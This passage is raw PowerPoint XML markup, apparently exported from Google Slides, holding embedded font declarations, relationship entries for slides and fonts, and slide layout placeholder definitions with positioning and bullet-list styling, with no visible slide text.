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13716000" cx="24377650"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId77"/>
      <p:boldItalic r:id="rId78"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId79"/>
      <p:bold r:id="rId80"/>
      <p:italic r:id="rId81"/>
      <p:boldItalic r:id="rId82"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId83"/>
      <p:bold r:id="rId84"/>
      <p:italic r:id="rId85"/>
      <p:boldItalic r:id="rId86"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Lato Light"/>
      <p:regular r:id="rId87"/>
      <p:bold r:id="rId88"/>
      <p:italic r:id="rId89"/>
      <p:boldItalic r:id="rId90"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>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guide id="7"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2B4CB7-2BE8-4553-86C2-8896E5BEEF5F}">
  <a:tblStyle styleId="{962B4CB7-2BE8-4553-86C2-8896E5BEEF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2896" orient="horz"/>
        <p:guide pos="2412" orient="horz"/>
        <p:guide pos="24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6.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide35.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-italic.fntdata"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide38.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-bold.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide37.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-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LatoLight-italic.fntdata"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId81"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Black-bold.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obotoMedium-regular.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-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font" Target="fonts/RobotoLight-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RobotoLight-regular.fntdata"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/LatoLight-boldItalic.fntdata"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-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e828e0789_0_25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e828e0789_0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e828e0789_0_976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e828e0789_0_97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e828e0789_0_13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e828e0789_0_13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e828e0789_0_870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e828e0789_0_87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e828e0789_0_342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e828e0789_0_34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e828e0789_0_448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e828e0789_0_44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e828e0789_0_553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e828e0789_0_55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e828e0789_0_764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e828e0789_0_76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e828e0789_0_659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e828e0789_0_65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e828e0789_0_1106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e828e0789_0_110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e828e0789_0_17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e828e0789_0_17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ce828e0789_0_171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c31d79042_4_44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c31d79042_4_4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c31d79042_4_45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c31d79042_4_4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c31d79042_4_47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c31d79042_4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e828e0789_0_150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e828e0789_0_150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c31d79042_4_44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c31d79042_4_4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e828e0789_0_1238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e828e0789_0_123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e828e0789_0_1369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e828e0789_0_136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e828e0789_0_1606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e828e0789_0_160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e828e0789_0_3592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e828e0789_0_359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e828e0789_0_370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e828e0789_0_370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ce828e0789_0_370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bda237455_4_129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bda237455_4_12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bda237455_4_25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bda237455_4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e828e0789_0_3917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e828e0789_0_39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e828e0789_0_402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e828e0789_0_40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e828e0789_0_4129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e828e0789_0_412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bda237455_4_333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bda237455_4_3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e828e0789_0_4234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e828e0789_0_423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e828e0789_0_4445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e828e0789_0_444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e828e0789_0_455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e828e0789_0_455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e828e0789_0_4973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e828e0789_0_497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e828e0789_0_5079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e828e0789_0_507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bda237455_4_23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bda237455_4_2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e828e0789_0_539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e828e0789_0_539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8bda237455_0_134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bda237455_0_13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bda237455_4_33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bda237455_4_33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bd883d690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bd883d690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cbd13e9aa2_5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cbd13e9aa2_5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bd13e9aa2_5_2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bd13e9aa2_5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e828e0789_0_550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e828e0789_0_550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bd13e9aa2_1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cbd13e9aa2_1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bd13e9aa2_13_3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bd13e9aa2_13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bd13e9aa2_13_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cbd13e9aa2_13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bd13e9aa2_1_319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bd13e9aa2_1_3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e828e0789_0_3594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e828e0789_0_359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e828e0789_0_18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ce828e0789_0_18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ce828e0789_0_182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ce828e0789_0_2164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ce828e0789_0_216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e828e0789_0_1927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e828e0789_0_19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e828e0789_0_20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e828e0789_0_205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ce828e0789_0_205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e828e0789_0_203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e828e0789_0_203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e828e0789_0_219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ce828e0789_0_219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ce828e0789_0_219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e828e0789_0_229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e828e0789_0_229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ce828e0789_0_229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ce828e0789_0_240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ce828e0789_0_240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ce828e0789_0_240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e828e0789_0_26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e828e0789_0_26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ce828e0789_0_261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bda237455_0_2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bda237455_0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e828e0789_0_27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e828e0789_0_27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ce828e0789_0_271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ce828e0789_0_28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ce828e0789_0_28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ce828e0789_0_282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e828e0789_0_348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ce828e0789_0_348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ce828e0789_0_348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ce828e0789_0_29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ce828e0789_0_293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ce828e0789_0_293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ce828e0789_0_3037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ce828e0789_0_303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ce828e0789_0_30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ce828e0789_0_306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gce828e0789_0_306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ce828e0789_0_31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ce828e0789_0_316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ce828e0789_0_316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ce828e0789_0_327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ce828e0789_0_327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ce828e0789_0_327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ce828e0789_0_33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ce828e0789_0_338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gce828e0789_0_338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ce828e0789_0_39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ce828e0789_0_39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ce828e0789_0_391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e828e0789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e828e078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cbd13e9aa2_5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cbd13e9aa2_5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e828e0789_0_38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e828e0789_0_38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ce828e0789_0_38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e828e0789_0_1712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e828e0789_0_17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831006" y="1985533"/>
            <a:ext cx="22715700" cy="54735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5" name="Google Shape;15;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="7557667"/>
            <a:ext cx="22715700" cy="21135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16" name="Google Shape;16;p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830984" y="2949667"/>
            <a:ext cx="22715700" cy="52359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50" name="Google Shape;50;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="8405933"/>
            <a:ext cx="22715700" cy="3468900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-533400" lvl="0" marL="457200" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-463550" lvl="1" marL="914400" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-463550" lvl="2" marL="1371600" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-463550" lvl="3" marL="1828800" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-463550" lvl="4" marL="2286000" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-463550" lvl="5" marL="2743200" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-463550" lvl="6" marL="3200400" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-463550" lvl="7" marL="3657600" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-463550" lvl="8" marL="4114800" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;51;p11"/>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56" name="Google Shape;56;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632102"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57" name="Google Shape;57;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22948089" y="13219200"/>
            <a:ext cx="698100" cy="281700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="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3"/>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9" name="Shape 59"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Google Shape;60;p1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 name="Google Shape;61;p14"/>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 name="Google Shape;62;p14"/>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63" name="Google Shape;63;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 name="Google Shape;64;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22948089" y="13219200"/>
            <a:ext cx="698100" cy="281700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="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5" name="Google Shape;65;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6" name="Google Shape;66;p1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67" name="Google Shape;67;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="32592" y="3728000"/>
            <a:ext cx="24377700" cy="1618500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="4144550" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="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68" name="Google Shape;68;p1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 name="Google Shape;69;p1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 name="Google Shape;70;p1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 name="Google Shape;71;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32592" y="5956133"/>
            <a:ext cx="24443100" cy="1618500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="4144550" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="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72" name="Google Shape;72;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8203400"/>
            <a:ext cx="24443100" cy="1618500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="4144550" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="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73" name="Google Shape;73;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="10450600"/>
            <a:ext cx="24443100" cy="1618500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="4144550" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="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pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Google Shape;74;p1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75" name="Google Shape;75;p1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76" name="Google Shape;76;p1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77" name="Google Shape;77;p1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78" name="Shape 78"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79" name="Google Shape;79;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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343"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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22948089" y="13219200"/>
            <a:ext cx="698100" cy="281700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="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15"/>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86" name="Google Shape;86;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1802600"/>
            <a:ext cx="177945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87" name="Google Shape;87;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3322133"/>
            <a:ext cx="17860800" cy="103935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88" name="Google Shape;88;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18811900" y="2427933"/>
            <a:ext cx="4836300" cy="10092900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="DBD9E8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="487575" lIns="487575" spcFirstLastPara="1" rIns="487575" wrap="square" tIns="487575">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2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89" name="Google Shape;89;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-33125" y="0"/>
            <a:ext cx="178608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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22948089" y="13219200"/>
            <a:ext cx="698100" cy="281700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="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1" name="Google Shape;91;p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92" name="Google Shape;92;p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 name="Google Shape;93;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4"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94" name="Shape 94"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p17"/>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 name="Google Shape;96;p17"/>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97" name="Google Shape;97;p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8" name="Google Shape;98;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22948089" y="13219200"/>
            <a:ext cx="698100" cy="281700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:norm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 name="Google Shape;99;p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00" name="Google Shape;100;p1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01" name="Google Shape;101;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377700" cy="95511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830984" y="5735600"/>
            <a:ext cx="22715700" cy="2244900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="24375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9" name="Google Shape;19;p3"/>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2" name="Google Shape;22;p4"/>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23" name="Google Shape;23;p4"/>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6" name="Google Shape;26;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83098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27" name="Google Shape;27;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288304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28" name="Google Shape;28;p5"/>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31" name="Google Shape;31;p6"/>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830984" y="1481600"/>
            <a:ext cx="7485900" cy="2015100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="24375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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="3705600"/>
            <a:ext cx="7485900" cy="8478300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-431800" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
              <a:defRPr sz="32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5" name="Google Shape;35;p7"/>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306993" y="1200400"/>
            <a:ext cx="16976400" cy="10908900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="24375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8" name="Google Shape;38;p8"/>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12188825" y="-333"/>
            <a:ext cx="12188700" cy="13716000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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707816" y="3288467"/>
            <a:ext cx="10784400" cy="39528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42" name="Google Shape;42;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707816" y="7474867"/>
            <a:ext cx="10784400" cy="32937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3" name="Google Shape;43;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13168570" y="1930867"/>
            <a:ext cx="10229400" cy="9853500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="24375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44" name="Google Shape;44;p9"/>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830984" y="11281533"/>
            <a:ext cx="15992700" cy="1613700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600" lvl="0" marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Google Shape;47;p10"/>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984" y="1186733"/>
            <a:ext cx="22715700" cy="1527300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:normAutofit/>
          </a:bodyPr>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="3073267"/>
            <a:ext cx="22715700" cy="9110400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243750" lIns="243750" spcFirstLastPara="1" rIns="243750" wrap="square" tIns="243750">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-533400" lvl="0" marL="457200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="4800"/>
              <a:buChar char="●"/>
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-463550" lvl="1" marL="914400">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-463550" lvl="2" marL="1371600">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-463550" lvl="3" marL="1828800">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-463550" lvl="4" marL="2286000">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-463550" lvl="5" marL="2743200">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-463550" lvl="6" marL="3200400">
              <a:lnSpc>
